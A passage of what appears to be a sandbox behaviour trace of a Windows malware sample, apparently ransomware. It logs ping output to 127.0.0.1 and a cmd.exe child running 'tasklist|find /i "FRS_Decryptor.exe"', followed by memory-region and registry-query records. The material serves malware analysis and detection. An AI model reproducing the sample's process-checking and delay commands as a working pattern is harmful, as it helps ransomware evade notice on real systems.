FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x4eed90, nSize=0x0, Arguments=0x4eed8c | out: lpBuffer="羠¬N⛔\x94䰨盪✣") returned 0x16 [0145.916] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0145.916] _fileno (_File=0x76ea4c28) returned 1 [0145.916] _get_osfhandle (_FileHandle=1) returned 0x28 [0145.916] GetFileType (hFile=0x28) returned 0x2 [0145.916] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eed54 | out: lpMode=0x4eed54) returned 0 [0145.916] GetLastError () returned 0x6 [0145.916] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eecb8, nSize=0x50 | out: lpBuffer="N✣") returned 0x0 [0145.916] _fileno (_File=0x76ea4c28) returned 1 [0145.916] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0145.916] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0145.916] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xac7fd8 [0145.916] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xac7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0145.916] _fileno (_File=0x76ea4c28) returned 1 [0145.916] _write (in: _FileHandle=1, _Buf=0xac7fd8*, _MaxCharCount=0x16 | out: _Buf=0xac7fd8*) returned 22 [0145.916] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0145.916] _fileno (_File=0x76ea4c28) returned 1 [0145.916] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0145.916] LocalFree (hMem=0xac7fd8) returned 0x0 [0145.916] LocalFree (hMem=0xac7fa0) returned 0x0 [0145.916] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x4eed90, nSize=0x0, Arguments=0x4eed8c | out: lpBuffer="羠¬N⛿\x94䰨盪✼") returned 0x9 [0145.916] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0145.916] _fileno (_File=0x76ea4c28) returned 1 [0145.916] _get_osfhandle (_FileHandle=1) returned 0x28 [0145.916] GetFileType (hFile=0x28) returned 0x2 [0145.916] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eed54 | out: lpMode=0x4eed54) returned 0 [0145.917] GetLastError () returned 0x6 [0145.917] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eecb8, nSize=0x50 | out: lpBuffer="N✼") returned 0x0 [0145.917] _fileno (_File=0x76ea4c28) returned 1 [0145.917] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0145.917] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0145.917] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xab8970 [0145.917] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xab8970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0145.917] _fileno (_File=0x76ea4c28) returned 1 [0145.917] _write (in: _FileHandle=1, _Buf=0xab8970*, _MaxCharCount=0x9 | out: _Buf=0xab8970*) returned 9 [0145.917] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0145.917] _fileno (_File=0x76ea4c28) returned 1 [0145.917] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0145.917] LocalFree (hMem=0xab8970) returned 0x0 [0145.917] LocalFree (hMem=0xac7fa0) returned 0x0 [0145.917] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x4eed94, nSize=0x0, Arguments=0x4eed90 | out: lpBuffer="羠¬N➷\x94䰨盪✧") returned 0x9 [0145.917] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0145.917] _fileno (_File=0x76ea4c28) returned 1 [0145.917] _get_osfhandle (_FileHandle=1) returned 0x28 [0145.917] GetFileType (hFile=0x28) returned 0x2 [0145.917] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eed58 | out: lpMode=0x4eed58) returned 0 [0145.917] GetLastError () returned 0x6 [0145.917] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eecbc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0145.917] _fileno (_File=0x76ea4c28) returned 1 [0145.917] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0145.917] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0145.917] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xab8910 [0145.917] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xab8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0145.917] _fileno (_File=0x76ea4c28) returned 1 [0145.917] _write (in: _FileHandle=1, _Buf=0xab8910*, _MaxCharCount=0x9 | out: _Buf=0xab8910*) returned 9 [0145.917] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0145.917] _fileno (_File=0x76ea4c28) returned 1 [0145.917] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0145.917] LocalFree (hMem=0xab8910) returned 0x0 [0145.917] LocalFree (hMem=0xac7fa0) returned 0x0 [0145.917] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x4eed90, nSize=0x0, Arguments=0x4eed8c | out: lpBuffer="羠¬N⟘\x94䰨盪✨") returned 0x9 [0145.917] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0145.917] _fileno (_File=0x76ea4c28) returned 1 [0145.917] _get_osfhandle (_FileHandle=1) returned 0x28 [0145.918] GetFileType (hFile=0x28) returned 0x2 [0145.918] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eed54 | out: lpMode=0x4eed54) returned 0 [0145.918] GetLastError () returned 0x6 [0145.918] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eecb8, nSize=0x50 | out: lpBuffer="N✨") returned 0x0 [0145.918] _fileno (_File=0x76ea4c28) returned 1 [0145.918] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0145.918] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0145.918] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xab8910 [0145.918] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xab8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0145.918] _fileno (_File=0x76ea4c28) returned 1 [0145.918] _write (in: _FileHandle=1, _Buf=0xab8910*, _MaxCharCount=0x9 | out: _Buf=0xab8910*) returned 9 [0145.918] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0145.918] _fileno (_File=0x76ea4c28) returned 1 [0145.918] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0145.918] LocalFree (hMem=0xab8910) returned 0x0 [0145.918] LocalFree (hMem=0xac7fa0) returned 0x0 [0145.918] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x4eed18, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0145.918] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x4eecec, nSize=0x0, Arguments=0x4eece8 | out: lpBuffer="羠¬N᧰\x94䰨盪❏") returned 0x5c [0145.918] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0145.918] _fileno (_File=0x76ea4c28) returned 1 [0145.918] _get_osfhandle (_FileHandle=1) returned 0x28 [0145.918] GetFileType (hFile=0x28) returned 0x2 [0145.918] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eecb0 | out: lpMode=0x4eecb0) returned 0 [0145.918] GetLastError () returned 0x6 [0145.918] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eec14, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0145.918] _fileno (_File=0x76ea4c28) returned 1 [0145.918] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0145.918] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0145.918] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0xac8068 [0145.918] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xac8068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0145.918] _fileno (_File=0x76ea4c28) returned 1 [0145.918] _write (in: _FileHandle=1, _Buf=0xac8068*, _MaxCharCount=0x5c | out: _Buf=0xac8068*) returned 92 [0145.918] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0145.918] _fileno (_File=0x76ea4c28) returned 1 [0145.919] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0145.919] LocalFree (hMem=0xac8068) returned 0x0 [0145.919] LocalFree (hMem=0xac7fa0) returned 0x0 [0145.919] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x4eecf8, nSize=0x0, Arguments=0x4eecf4 | out: lpBuffer="羠¬Nᨧ\x94䰨盪❓") returned 0x61 [0145.919] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0145.919] _fileno (_File=0x76ea4c28) returned 1 [0145.919] _get_osfhandle (_FileHandle=1) returned 0x28 [0145.919] GetFileType (hFile=0x28) returned 0x2 [0145.919] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eecbc | out: lpMode=0x4eecbc) returned 0 [0145.919] GetLastError () returned 0x6 [0145.919] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eec20, nSize=0x50 | out: lpBuffer="N❓") returned 0x0 [0145.919] _fileno (_File=0x76ea4c28) returned 1 [0145.919] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0145.919] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0145.919] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xac8070 [0145.919] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xac8070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0145.919] _fileno (_File=0x76ea4c28) returned 1 [0145.919] _write (in: _FileHandle=1, _Buf=0xac8070*, _MaxCharCount=0x61 | out: _Buf=0xac8070*) returned 97 [0145.919] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0145.919] _fileno (_File=0x76ea4c28) returned 1 [0145.919] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0145.919] LocalFree (hMem=0xac8070) returned 0x0 [0145.919] LocalFree (hMem=0xac7fa0) returned 0x0 [0145.919] IcmpCloseHandle (IcmpHandle=0xab6b80) returned 1 [0145.919] LocalFree (hMem=0xabc250) returned 0x0 [0145.919] LocalFree (hMem=0xac5270) returned 0x0 [0145.920] WSACleanup () returned 0 [0145.920] exit (_Code=0) Thread: id = 447 os_tid = 0x9dc Thread: id = 448 os_tid = 0x408 Process: id = "163" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2271f000" os_pid = "0x4c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8321 start_va = 0xd90000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 8322 start_va = 0xdb0000 end_va = 0xdb1fff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 8323 start_va = 0xdc0000 end_va = 0xdcefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dc0000" filename = "" Region: id = 8324 start_va = 0xdd0000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 8325 start_va = 0xe10000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 8326 start_va = 0xf10000 end_va = 0xf13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f10000" filename = "" Region: id = 8327 start_va = 0xf20000 end_va = 0xf20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f20000" filename = "" Region: id = 8328 start_va = 0xf30000 end_va = 0xf31fff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 8329 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 8330 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8331 start_va = 0x7e4b0000 end_va = 0x7e4d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e4b0000" filename = "" Region: id = 8332 start_va = 0x7e4d9000 end_va = 0x7e4d9fff entry_point = 0x0 region_type = private name = "private_0x000000007e4d9000" filename = "" Region: id = 8333 start_va = 0x7e4dc000 end_va = 0x7e4defff entry_point = 0x0 region_type = private name = "private_0x000000007e4dc000" filename = "" Region: id = 8334 start_va = 0x7e4df000 end_va = 0x7e4dffff entry_point = 0x0 region_type = private name = "private_0x000000007e4df000" filename = "" Region: id = 8335 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8336 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8337 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8338 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 8339 start_va = 0xf80000 end_va = 0xf8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 8340 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8341 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8342 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8343 start_va = 0xd90000 end_va = 0xd9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d90000" filename = "" Region: id = 8344 start_va = 0xfb0000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 8345 start_va = 0x10b0000 end_va = 0x112dfff entry_point = 0x10b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8346 start_va = 0x1480000 end_va = 0x148ffff entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 8347 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8348 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8349 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8350 start_va = 0x7e3b0000 end_va = 0x7e4affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e3b0000" filename = "" Region: id = 8351 start_va = 0xda0000 end_va = 0xda3fff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 8352 start_va = 0x1490000 end_va = 0x1764fff entry_point = 0x1490000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8371 start_va = 0xdb0000 end_va = 0xdb3fff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Thread: id = 449 os_tid = 0x8a0 [0145.953] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0145.953] __set_app_type (_Type=0x1) [0145.953] __p__fmode () returned 0x76ea1768 [0145.953] __p__commode () returned 0x76ea176c [0145.953] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0145.953] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0145.954] GetCurrentThreadId () returned 0x8a0 [0145.954] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8a0) returned 0x34 [0145.954] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0145.954] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0145.954] SetThreadUILanguage (LangId=0x0) returned 0x409 [0145.957] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0145.957] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xf0fbbc | out: phkResult=0xf0fbbc*=0x0) returned 0x2 [0145.958] VirtualQuery (in: lpAddress=0xf0fbcb, lpBuffer=0xf0fb64, dwLength=0x1c | out: lpBuffer=0xf0fb64*(BaseAddress=0xf0f000, AllocationBase=0xe10000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.958] VirtualQuery (in: lpAddress=0xe10000, lpBuffer=0xf0fb64, dwLength=0x1c | out: lpBuffer=0xf0fb64*(BaseAddress=0xe10000, AllocationBase=0xe10000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0145.958] VirtualQuery (in: lpAddress=0xe11000, lpBuffer=0xf0fb64, dwLength=0x1c | out: lpBuffer=0xf0fb64*(BaseAddress=0xe11000, AllocationBase=0xe10000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0145.958] VirtualQuery (in: lpAddress=0xe13000, lpBuffer=0xf0fb64, dwLength=0x1c | out: lpBuffer=0xf0fb64*(BaseAddress=0xe13000, AllocationBase=0xe10000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.958] VirtualQuery (in: lpAddress=0xf10000, lpBuffer=0xf0fb64, dwLength=0x1c | out: lpBuffer=0xf0fb64*(BaseAddress=0xf10000, AllocationBase=0xf10000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0145.958] GetConsoleOutputCP () returned 0x1b5 [0145.958] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0145.958] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0145.958] _get_osfhandle (_FileHandle=1) returned 0x2e8 [0145.958] SetConsoleMode (hConsoleHandle=0x2e8, dwMode=0x0) returned 0 [0145.958] _get_osfhandle (_FileHandle=1) returned 0x2e8 [0145.958] GetConsoleMode (in: hConsoleHandle=0x2e8, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0145.958] _get_osfhandle (_FileHandle=0) returned 0x24 [0145.959] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0145.959] GetEnvironmentStringsW () returned 0xfb40c0* [0145.959] FreeEnvironmentStringsA (penv="=") returned 1 [0145.959] GetEnvironmentStringsW () returned 0xfb40c0* [0145.960] FreeEnvironmentStringsA (penv="=") returned 1 [0145.960] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xf0eb0c | out: phkResult=0xf0eb0c*=0x44) returned 0x0 [0145.960] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xf0eb14, lpData=0xf0eb18, lpcbData=0xf0eb10*=0x1000 | out: lpType=0xf0eb14*=0x0, lpData=0xf0eb18*=0xb2, lpcbData=0xf0eb10*=0x1000) returned 0x2 [0145.960] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xf0eb14, lpData=0xf0eb18, lpcbData=0xf0eb10*=0x1000 | out: lpType=0xf0eb14*=0x4, lpData=0xf0eb18*=0x1, lpcbData=0xf0eb10*=0x4) returned 0x0 [0145.960] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xf0eb14, lpData=0xf0eb18, lpcbData=0xf0eb10*=0x1000 | out: lpType=0xf0eb14*=0x0, lpData=0xf0eb18*=0x1, lpcbData=0xf0eb10*=0x1000) returned 0x2 [0145.960] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xf0eb14, lpData=0xf0eb18, lpcbData=0xf0eb10*=0x1000 | out: lpType=0xf0eb14*=0x4, lpData=0xf0eb18*=0x0, lpcbData=0xf0eb10*=0x4) returned 0x0 [0145.960] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xf0eb14, lpData=0xf0eb18, lpcbData=0xf0eb10*=0x1000 | out: lpType=0xf0eb14*=0x4, lpData=0xf0eb18*=0x40, lpcbData=0xf0eb10*=0x4) returned 0x0 [0145.960] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xf0eb14, lpData=0xf0eb18, lpcbData=0xf0eb10*=0x1000 | out: lpType=0xf0eb14*=0x4, lpData=0xf0eb18*=0x40, lpcbData=0xf0eb10*=0x4) returned 0x0 [0145.960] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xf0eb14, lpData=0xf0eb18, lpcbData=0xf0eb10*=0x1000 | out: lpType=0xf0eb14*=0x0, lpData=0xf0eb18*=0x40, lpcbData=0xf0eb10*=0x1000) returned 0x2 [0145.960] RegCloseKey (hKey=0x44) returned 0x0 [0145.960] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xf0eb0c | out: phkResult=0xf0eb0c*=0x44) returned 0x0 [0145.960] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xf0eb14, lpData=0xf0eb18, lpcbData=0xf0eb10*=0x1000 | out: lpType=0xf0eb14*=0x0, lpData=0xf0eb18*=0x40, lpcbData=0xf0eb10*=0x1000) returned 0x2 [0145.960] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xf0eb14, lpData=0xf0eb18, lpcbData=0xf0eb10*=0x1000 | out: lpType=0xf0eb14*=0x4, lpData=0xf0eb18*=0x1, lpcbData=0xf0eb10*=0x4) returned 0x0 [0145.960] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xf0eb14, lpData=0xf0eb18, lpcbData=0xf0eb10*=0x1000 | out: lpType=0xf0eb14*=0x0, lpData=0xf0eb18*=0x1, lpcbData=0xf0eb10*=0x1000) returned 0x2 [0145.960] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xf0eb14, lpData=0xf0eb18, lpcbData=0xf0eb10*=0x1000 | out: lpType=0xf0eb14*=0x4, lpData=0xf0eb18*=0x0, lpcbData=0xf0eb10*=0x4) returned 0x0 [0145.960] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xf0eb14, lpData=0xf0eb18, lpcbData=0xf0eb10*=0x1000 | out: lpType=0xf0eb14*=0x4, lpData=0xf0eb18*=0x9, lpcbData=0xf0eb10*=0x4) returned 0x0 [0145.960] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xf0eb14, lpData=0xf0eb18, lpcbData=0xf0eb10*=0x1000 | out: lpType=0xf0eb14*=0x4, lpData=0xf0eb18*=0x9, lpcbData=0xf0eb10*=0x4) returned 0x0 [0145.960] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, 